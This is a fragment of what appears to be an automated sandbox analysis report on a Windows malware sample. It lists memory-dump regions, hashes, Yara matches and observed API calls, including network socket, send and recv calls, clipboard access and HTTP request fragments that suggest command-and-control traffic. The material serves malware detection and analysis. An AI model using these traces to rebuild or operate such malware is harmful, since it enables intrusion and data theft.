                                                                                          • Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                                                          • Instruction ID: 83412e0b4189d4d4f95db6b79411f9ca192822044c6dd68013b77dcf305b7392
                                                                                          • Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                                                          • Instruction Fuzzy Hash: ACB092328108418BCF06AB80C650A197331BB00650F0584909001679208228AC01DA40
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: ff0474ac496566ee54ab4fb49c642c6732913733ce6f7ee7e6901707d8cce6a8
                                                                                          • Instruction ID: ed7affd374944103a02d2d345bd5dec8faaa24a31109ab2d7e22fdda58d88a43
                                                                                          • Opcode Fuzzy Hash: ff0474ac496566ee54ab4fb49c642c6732913733ce6f7ee7e6901707d8cce6a8
                                                                                          • Instruction Fuzzy Hash: 039002A221100042D10871998404B061045A7E1641F51C057E2144558CC6698C71A565
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true
                                                                                          C-Code - Quality: 53%
                                                                                          			E01BCFDDA(intOrPtr* __edx, intOrPtr _a4) {
                                                                                          				void* _t7;
                                                                                          				intOrPtr _t9;
                                                                                          				intOrPtr _t10;
                                                                                          				intOrPtr* _t12;
                                                                                          				intOrPtr* _t13;
                                                                                          				intOrPtr _t14;
                                                                                          				intOrPtr* _t15;
                                                                                          
                                                                                          				_t13 = __edx;
                                                                                          				_push(_a4);
                                                                                          				_t14 =  *[fs:0x18];
                                                                                          				_t15 = _t12;
                                                                                          				_t7 = E01B7CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                                                                          				_push(_t13);
                                                                                          				E01BC5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                                                                          				_t9 =  *_t15;
                                                                                          				if(_t9 == 0xffffffff) {
                                                                                          					_t10 = 0;
                                                                                          				} else {
                                                                                          					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                                                                          				}
                                                                                          				_push(_t10);
                                                                                          				_push(_t15);
                                                                                          				_push( *((intOrPtr*)(_t15 + 0xc)));
                                                                                          				_push( *((intOrPtr*)(_t14 + 0x24)));
                                                                                          				return E01BC5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                                                                          			}











                                                                                          APIs
                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01BCFDFA
                                                                                          Strings
                                                                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 01BCFE01
                                                                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 01BCFE2B
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                                          • API String ID: 885266447-3903918235
                                                                                          • Opcode ID: 6007da7ad06a566d55fcb0efdb9c8420c008d35191b0d8562097dc6d8160970f
                                                                                          • Instruction ID: 0675671f939abe4a1f9ced0ea7cc76bcc29b349b7b856d6505c8001b9f827e01
                                                                                          • Opcode Fuzzy Hash: 6007da7ad06a566d55fcb0efdb9c8420c008d35191b0d8562097dc6d8160970f
                                                                                          • Instruction Fuzzy Hash: DCF0FC32200102BFDA281A45DC05F337F5ADB44B31F14439DF628561E1DB62F86086F0
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Executed Functions

                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000F.00000002.919182822.0000000004DA0000.00000040.00000001.sdmp, Offset: 04DA0000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: getaddrinforecvsetsockopt
                                                                                          • String ID: Co$&br=$&un=$: cl$=$GET $dat=$nnec$ose$tion
                                                                                          • API String ID: 1564272048-2976227712
                                                                                          • Opcode ID: b31e8b864956b6b4abfa9b859ad4291af29cc5130ca763e476aa0a2d5a1583bf
                                                                                          • Instruction ID: 845e7a000c766992ab57cb998ab95ac90f0350b739ce0848a8f53b84a17629e9
                                                                                          • Opcode Fuzzy Hash: b31e8b864956b6b4abfa9b859ad4291af29cc5130ca763e476aa0a2d5a1583bf
                                                                                          • Instruction Fuzzy Hash: 29628030628B098BDB69EF68D4847AAB7E2FB98704F50452ED59FC7142DF30B446CB91
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000F.00000002.919182822.0000000004DA0000.00000040.00000001.sdmp, Offset: 04DA0000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: ClipboardOpen
                                                                                          • String ID:
                                                                                          • API String ID: 2793039342-0
                                                                                          • Opcode ID: c435c781f8fbf6caabe55a16d7c60c026a95aedc4a66d9b66e8dd31f9fb2c40d
                                                                                          • Instruction ID: a914e76c718f8532b634f03ec694eadf59d25a14a8c69453b16d4636af088339
                                                                                          • Opcode Fuzzy Hash: c435c781f8fbf6caabe55a16d7c60c026a95aedc4a66d9b66e8dd31f9fb2c40d
                                                                                          • Instruction Fuzzy Hash: 1311A530214D1A9FDB59AB2894AC3B631D0FB48306F9814BD944ECF0C1DF76E586DB50
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000F.00000002.919182822.0000000004DA0000.00000040.00000001.sdmp, Offset: 04DA0000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: closesocket
                                                                                          • String ID: clos$esoc$ket
                                                                                          • API String ID: 2781271927-3604069445
                                                                                          • Opcode ID: debb1de1ae8bd1935cf3204c4e922018d3bc3bd1fa25b861d450e182fb477b51
                                                                                          • Instruction ID: 61c245f9f5ae425b0b17bdb3631023364ec4b37c3b322122e8b342b132c8cf72
                                                                                          • Opcode Fuzzy Hash: debb1de1ae8bd1935cf3204c4e922018d3bc3bd1fa25b861d450e182fb477b51
                                                                                          • Instruction Fuzzy Hash: 32F06D7021CB089BCBC0EF2894897A9B7E0FB99315F54056EE48DCB204CB7895428782
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000F.00000002.919182822.0000000004DA0000.00000040.00000001.sdmp, Offset: 04DA0000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: closesocket
                                                                                          • String ID: clos$esoc$ket
                                                                                          • API String ID: 2781271927-3604069445
                                                                                          • Opcode ID: 38f943f3a1bf856e04ab8ffe01a156dfd9c5375a96730fcfdde4480564b18170
                                                                                          • Instruction ID: 87e4306d74e8f31962f4244a11be7739af20048f02b114dc4851f60e37427665
                                                                                          • Opcode Fuzzy Hash: 38f943f3a1bf856e04ab8ffe01a156dfd9c5375a96730fcfdde4480564b18170
                                                                                          • Instruction Fuzzy Hash: C3F01D7021CB089FDBC4EF18D0C4769B7E0FB99314F54556DB44DCB244CB7485458782
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000F.00000002.919182822.0000000004DA0000.00000040.00000001.sdmp, Offset: 04DA0000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: connect
                                                                                          • String ID: conn$ect
                                                                                          • API String ID: 1959786783-716201944
                                                                                          • Opcode ID: fb95bafb82b3473d6ef4390d0af350634b81bde5baa335949624609cad2727e7
                                                                                          • Instruction ID: 3ccc7282f860570087128cb7b2b80b73ccbc6677b1e2665c4da4ac69a4638fbe
                                                                                          • Opcode Fuzzy Hash: fb95bafb82b3473d6ef4390d0af350634b81bde5baa335949624609cad2727e7
                                                                                          • Instruction Fuzzy Hash: 12017C70618A088FDB84EF1CE088B15BBE0FB58314F1545AFE80DCB227CBB0D8858B81
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000F.00000002.919182822.0000000004DA0000.00000040.00000001.sdmp, Offset: 04DA0000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: connect
                                                                                          • String ID: conn$ect
                                                                                          • API String ID: 1959786783-716201944
                                                                                          • Opcode ID: 26898fd5f90645f94afd46a3ac35e2686c27f416d54a17c3d9a13a012a848fc3
                                                                                          • Instruction ID: 0e74f001566157444d70782ed4af2fe0d57010616fc08a2c73fd93fef6849e0c
                                                                                          • Opcode Fuzzy Hash: 26898fd5f90645f94afd46a3ac35e2686c27f416d54a17c3d9a13a012a848fc3
                                                                                          • Instruction Fuzzy Hash: 4C014F70618A188FDB84EF5CE088B15B7E0FB58315F1545AFE80DCB227CB70D8818B81
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000F.00000002.919182822.0000000004DA0000.00000040.00000001.sdmp, Offset: 04DA0000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: send
                                                                                          • String ID: send
                                                                                          • API String ID: 2809346765-2809346765
                                                                                          • Opcode ID: 06a0e18ca9c1e1e84b1de7ba9482a901a96b4c92f796fb4ce4398a9b5ac61c15
                                                                                          • Instruction ID: d2ffa509818b21a04c0469ebc8a98bb29f4d9501207005d1a312f3c498c070a7
                                                                                          • Opcode Fuzzy Hash: 06a0e18ca9c1e1e84b1de7ba9482a901a96b4c92f796fb4ce4398a9b5ac61c15
                                                                                          • Instruction Fuzzy Hash: D1012130618A088FDB84EF5CA089B1577E0EB98324F1545AE984DCB266CB70D881CB82
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000F.00000002.919182822.0000000004DA0000.00000040.00000001.sdmp, Offset: 04DA0000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: send
                                                                                          • String ID: send
                                                                                          • API String ID: 2809346765-2809346765
                                                                                          • Opcode ID: 3773d62206420a3ed138edb7b0d1187259b6e4662953c22d04494397483c12ef
                                                                                          • Instruction ID: cb6fdcfd2be426d6e20f4cda0c1e02a7dcae6df4aba22968123c6cacfe5b557a
                                                                                          • Opcode Fuzzy Hash: 3773d62206420a3ed138edb7b0d1187259b6e4662953c22d04494397483c12ef
                                                                                          • Instruction Fuzzy Hash: FA01D27061CA088FDB84EF5CE589B1577E4EB5C315F1545AE984DCB266CB70D881CB81
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000F.00000002.919182822.0000000004DA0000.00000040.00000001.sdmp, Offset: 04DA0000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: socket
                                                                                          • String ID: sock
                                                                                          • API String ID: 98920635-2415254727
                                                                                          • Opcode ID: 324350153747078c09b6e059cc1e16611ed0418a95caa11cf7f7e91404692acf
                                                                                          • Instruction ID: 069d3a6c0ad825bfa67bb25e6b27cb4f3604af6a45fd53abf4a15ce3ceb2b717
                                                                                          • Opcode Fuzzy Hash: 324350153747078c09b6e059cc1e16611ed0418a95caa11cf7f7e91404692acf
                                                                                          • Instruction Fuzzy Hash: C4012870658A188FDB84EF1CE048B14BBE0FB98314F1545AEE84DCB266C7B0D9418B86
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000F.00000002.919182822.0000000004DA0000.00000040.00000001.sdmp, Offset: 04DA0000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: Sleep
                                                                                          • String ID:
                                                                                          • API String ID: 3472027048-0
                                                                                          • Opcode ID: fd57b9079238b9e4bf1c504420f21d1e9a897069bc43c21d39ffc44af76478d5
                                                                                          • Instruction ID: 27c15991774aaab9afda1e44874e9a4cc7283f9b4b6aa874d1b93b3d47560303
                                                                                          • Opcode Fuzzy Hash: fd57b9079238b9e4bf1c504420f21d1e9a897069bc43c21d39ffc44af76478d5
                                                                                          • Instruction Fuzzy Hash: 53213230654B4E8FDF54EF5890A43A9B7E1FB95304F48067E995ECB246CF70A4418B91
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000F.00000002.919182822.0000000004DA0000.00000040.00000001.sdmp, Offset: 04DA0000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: ClipboardOpen
                                                                                          • String ID:
                                                                                          • API String ID: 2793039342-0
                                                                                          • Opcode ID: 0a81b9c5098993d40a50e0f995296f7c58cd9fe7fb6d482d8f883cb673d857ef
                                                                                          • Instruction ID: fface16fe7296835222a01494f0a33f0f843dcdfcf0984e289d48e3dac9f6d6d
                                                                                          • Opcode Fuzzy Hash: 0a81b9c5098993d40a50e0f995296f7c58cd9fe7fb6d482d8f883cb673d857ef
                                                                                          • Instruction Fuzzy Hash: 3E11A330214D1A9FDB59AB28946C3B932D0FB48306F9854BD944ECF0C2DF75E586DB50
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Non-executed Functions

                                                                                          Executed Functions

                                                                                          APIs
                                                                                          • NtCreateFile.NTDLL(00000060,00000000,.z`,02843BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02843BA7,007A002E,00000000,00000060,00000000,00000000), ref: 0284821D
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000011.00000002.909733720.0000000002830000.00000040.00000001.sdmp, Offset: 02830000, based on PE: false
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CreateFile
                                                                                          • String ID: .z`
                                                                                          • API String ID: 823142352-1441809116
                                                                                          • Opcode ID: 3d553f811ccc20941b12f73d839713f968f0d8390c9e3bd2cbd2a0723d2fd7c8
                                                                                          • Instruction ID: 6b9740cacf73e24a8520d9fdfe379fc3eed1c3349529783b4301610a0b5d77d7
                                                                                          • Opcode Fuzzy Hash: 3d553f811ccc20941b12f73d839713f968f0d8390c9e3bd2cbd2a0723d2fd7c8
                                                                                          • Instruction Fuzzy Hash: 4901AFB6205508AFCB18CF98DC94EEB77A9AF8C354F158258FA1DE7241C630E851CBA0
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • NtReadFile.NTDLL(02843D62,5E972F59,FFFFFFFF,02843A21,?,?,02843D62,?,02843A21,FFFFFFFF,5E972F59,02843D62,?,00000000), ref: 028482C5
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000011.00000002.909733720.0000000002830000.00000040.00000001.sdmp, Offset: 02830000, based on PE: false
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: FileRead
                                                                                          • String ID:
                                                                                          • API String ID: 2738559852-0
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02832D11,00002000,00003000,00000004), ref: 028483E9
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000011.00000002.909733720.0000000002830000.00000040.00000001.sdmp, Offset: 02830000, based on PE: false
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AllocateMemoryVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 2167126740-0
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • NtClose.NTDLL(02843D40,?,?,02843D40,00000000,FFFFFFFF), ref: 02848325
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000011.00000002.909733720.0000000002830000.00000040.00000001.sdmp, Offset: 02830000, based on PE: false
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Close
                                                                                          • String ID:
                                                                                          • API String ID: 3535843008-0
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000011.00000002.910088572.0000000002D30000.00000040.00000001.sdmp, Offset: 02D30000, based on PE: true
                                                                                          • Associated: 00000011.00000002.910294898.0000000002E4B000.00000040.00000001.sdmp
                                                                                          • Associated: 00000011.00000002.910305789.0000000002E4F000.00000040.00000001.sdmp
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000011.00000002.910088572.0000000002D30000.00000040.00000001.sdmp, Offset: 02D30000, based on PE: true
                                                                                          • Associated: 00000011.00000002.910294898.0000000002E4B000.00000040.00000001.sdmp Download File
                                                                                          • Associated: 00000011.00000002.910305789.0000000002E4F000.00000040.00000001.sdmp Download File
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: d7ef9d468712496e8f2cbe84a6eaae7264e12a5c53a188be6c93961c334a9f21
                                                                                          • Instruction ID: 5515748a8b3295ca774d7f4bb1eb5a80309134f5dcd5179928f4b52c99ef9931
                                                                                          • Opcode Fuzzy Hash: d7ef9d468712496e8f2cbe84a6eaae7264e12a5c53a188be6c93961c334a9f21
                                                                                          • Instruction Fuzzy Hash: 59900261242041665545B15944149074007A7E42817D1C012A14049B0C89669C96E661
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000011.00000002.910088572.0000000002D30000.00000040.00000001.sdmp, Offset: 02D30000, based on PE: true
                                                                                          • Associated: 00000011.00000002.910294898.0000000002E4B000.00000040.00000001.sdmp Download File
                                                                                          • Associated: 00000011.00000002.910305789.0000000002E4F000.00000040.00000001.sdmp Download File
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: cc9624989e35511a4f04c2031fcf68a1460c51df28f9aa798f5da14271f34e39
                                                                                          • Instruction ID: c1ba6675298ff8ad93bc080ce556db56744c8e2bf4c1a9003e6d83f82bb2c9fd
                                                                                          • Opcode Fuzzy Hash: cc9624989e35511a4f04c2031fcf68a1460c51df28f9aa798f5da14271f34e39
                                                                                          • Instruction Fuzzy Hash: 8490027120100427D11161594514B07000A97D4281FD1C412A04145B8D9A968D92B161
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000011.00000002.910088572.0000000002D30000.00000040.00000001.sdmp, Offset: 02D30000, based on PE: true
                                                                                          • Associated: 00000011.00000002.910294898.0000000002E4B000.00000040.00000001.sdmp Download File
                                                                                          • Associated: 00000011.00000002.910305789.0000000002E4F000.00000040.00000001.sdmp Download File
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: 762aa75fea8f22da3d9e86fc12f73ef779f156ed590a07b3ea565cd5465c3bb8
                                                                                          • Instruction ID: 0349a5babb9a65718c9b74979002dbe87eb4ed90eddc91ccbb40bd9caa483ae4
                                                                                          • Opcode Fuzzy Hash: 762aa75fea8f22da3d9e86fc12f73ef779f156ed590a07b3ea565cd5465c3bb8
                                                                                          • Instruction Fuzzy Hash: 179002A134100456D10061594424F070006D7E5341F91C015E10545B4D8A59CC927166
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000011.00000002.910088572.0000000002D30000.00000040.00000001.sdmp, Offset: 02D30000, based on PE: true
                                                                                          • Associated: 00000011.00000002.910294898.0000000002E4B000.00000040.00000001.sdmp Download File
                                                                                          • Associated: 00000011.00000002.910305789.0000000002E4F000.00000040.00000001.sdmp Download File
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: 30bb556b337eccdfa5b7cf3df72e634d6e48fe04d5b7c9aed6a7d52dd5ba5c27
                                                                                          • Instruction ID: 7dd010adc158148dc7154680b8268d5d39a92d29110009262279834903bc1f21
                                                                                          • Opcode Fuzzy Hash: 30bb556b337eccdfa5b7cf3df72e634d6e48fe04d5b7c9aed6a7d52dd5ba5c27
                                                                                          • Instruction Fuzzy Hash: 519002B120100416D14071594414B47000697D4341F91C011A50545B4E8A998DD576A5
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000011.00000002.910088572.0000000002D30000.00000040.00000001.sdmp, Offset: 02D30000, based on PE: true
                                                                                          • Associated: 00000011.00000002.910294898.0000000002E4B000.00000040.00000001.sdmp Download File
                                                                                          • Associated: 00000011.00000002.910305789.0000000002E4F000.00000040.00000001.sdmp Download File
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: f9a24c992c8f0594f15726c90cef8f44159c67f66a79ef8e562443b8b5e3e16b
                                                                                          • Instruction ID: 28d9b53570b3d63b5828c770102d31e35440dee3beb22467cf4510407f8e610e
                                                                                          • Opcode Fuzzy Hash: f9a24c992c8f0594f15726c90cef8f44159c67f66a79ef8e562443b8b5e3e16b
                                                                                          • Instruction Fuzzy Hash: D690027120100856D10061594414F47000697E4341F91C016A01146B4D8A55CC917561
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000011.00000002.910088572.0000000002D30000.00000040.00000001.sdmp, Offset: 02D30000, based on PE: true
                                                                                          • Associated: 00000011.00000002.910294898.0000000002E4B000.00000040.00000001.sdmp Download File
                                                                                          • Associated: 00000011.00000002.910305789.0000000002E4F000.00000040.00000001.sdmp Download File
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: 95a7f8375d1512bbdd4b390e7fd39462689c966f1e59d16c2ed01101c3760699
                                                                                          • Instruction ID: a2e4a6d836b2b47fd55f86688c326b777ada9b48c6b868cdec5dedb3208a5778
                                                                                          • Opcode Fuzzy Hash: 95a7f8375d1512bbdd4b390e7fd39462689c966f1e59d16c2ed01101c3760699
                                                                                          • Instruction Fuzzy Hash: 0490027120108816D11061598414B4B000697D4341F95C411A44146B8D8AD58CD17161
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000011.00000002.910088572.0000000002D30000.00000040.00000001.sdmp, Offset: 02D30000, based on PE: true
                                                                                          • Associated: 00000011.00000002.910294898.0000000002E4B000.00000040.00000001.sdmp Download File
                                                                                          • Associated: 00000011.00000002.910305789.0000000002E4F000.00000040.00000001.sdmp Download File
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: ce5217a3865ccfa5199ea697b7e372fe60150615778dc78e03012aa1c34434e8
                                                                                          • Instruction ID: 40eeb554ab8ff9b21a7628695a98503fc9924d977c6c56071908e8694faee052
                                                                                          • Opcode Fuzzy Hash: ce5217a3865ccfa5199ea697b7e372fe60150615778dc78e03012aa1c34434e8
                                                                                          • Instruction Fuzzy Hash: 4D90027120504856D14071594414E47001697D4345F91C011A00546F4D9A658D95B6A1
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000011.00000002.910088572.0000000002D30000.00000040.00000001.sdmp, Offset: 02D30000, based on PE: true
                                                                                          • Associated: 00000011.00000002.910294898.0000000002E4B000.00000040.00000001.sdmp
                                                                                          • Associated: 00000011.00000002.910305789.0000000002E4F000.00000040.00000001.sdmp
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000011.00000002.910088572.0000000002D30000.00000040.00000001.sdmp, Offset: 02D30000, based on PE: true
                                                                                          • Associated: 00000011.00000002.910294898.0000000002E4B000.00000040.00000001.sdmp
                                                                                          • Associated: 00000011.00000002.910305789.0000000002E4F000.00000040.00000001.sdmp
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000011.00000002.910088572.0000000002D30000.00000040.00000001.sdmp, Offset: 02D30000, based on PE: true
                                                                                          • Associated: 00000011.00000002.910294898.0000000002E4B000.00000040.00000001.sdmp
                                                                                          • Associated: 00000011.00000002.910305789.0000000002E4F000.00000040.00000001.sdmp
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000011.00000002.910088572.0000000002D30000.00000040.00000001.sdmp, Offset: 02D30000, based on PE: true
                                                                                          • Associated: 00000011.00000002.910294898.0000000002E4B000.00000040.00000001.sdmp
                                                                                          • Associated: 00000011.00000002.910305789.0000000002E4F000.00000040.00000001.sdmp
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000011.00000002.910088572.0000000002D30000.00000040.00000001.sdmp, Offset: 02D30000, based on PE: true
                                                                                          • Associated: 00000011.00000002.910294898.0000000002E4B000.00000040.00000001.sdmp
                                                                                          • Associated: 00000011.00000002.910305789.0000000002E4F000.00000040.00000001.sdmp
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000011.00000002.910088572.0000000002D30000.00000040.00000001.sdmp, Offset: 02D30000, based on PE: true
                                                                                          • Associated: 00000011.00000002.910294898.0000000002E4B000.00000040.00000001.sdmp
                                                                                          • Associated: 00000011.00000002.910305789.0000000002E4F000.00000040.00000001.sdmp
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • Sleep.KERNELBASE(000007D0), ref: 02846F98
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000011.00000002.909733720.0000000002830000.00000040.00000001.sdmp, Offset: 02830000, based on PE: false
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Sleep
                                                                                          • String ID: net.dll$wininet.dll
                                                                                          • API String ID: 3472027048-1269752229
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • Sleep.KERNELBASE(000007D0), ref: 02846F98
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000011.00000002.909733720.0000000002830000.00000040.00000001.sdmp, Offset: 02830000, based on PE: false
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Sleep
                                                                                          • String ID: net.dll$wininet.dll
                                                                                          • API String ID: 3472027048-1269752229
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02833B93), ref: 0284850D
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000011.00000002.909733720.0000000002830000.00000040.00000001.sdmp, Offset: 02830000, based on PE: false
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: FreeHeap
                                                                                          • String ID: .z`
                                                                                          • API String ID: 3298025750-1441809116
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 028372CA
                                                                                          • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 028372EB
                                                                                          Memory Dump Source
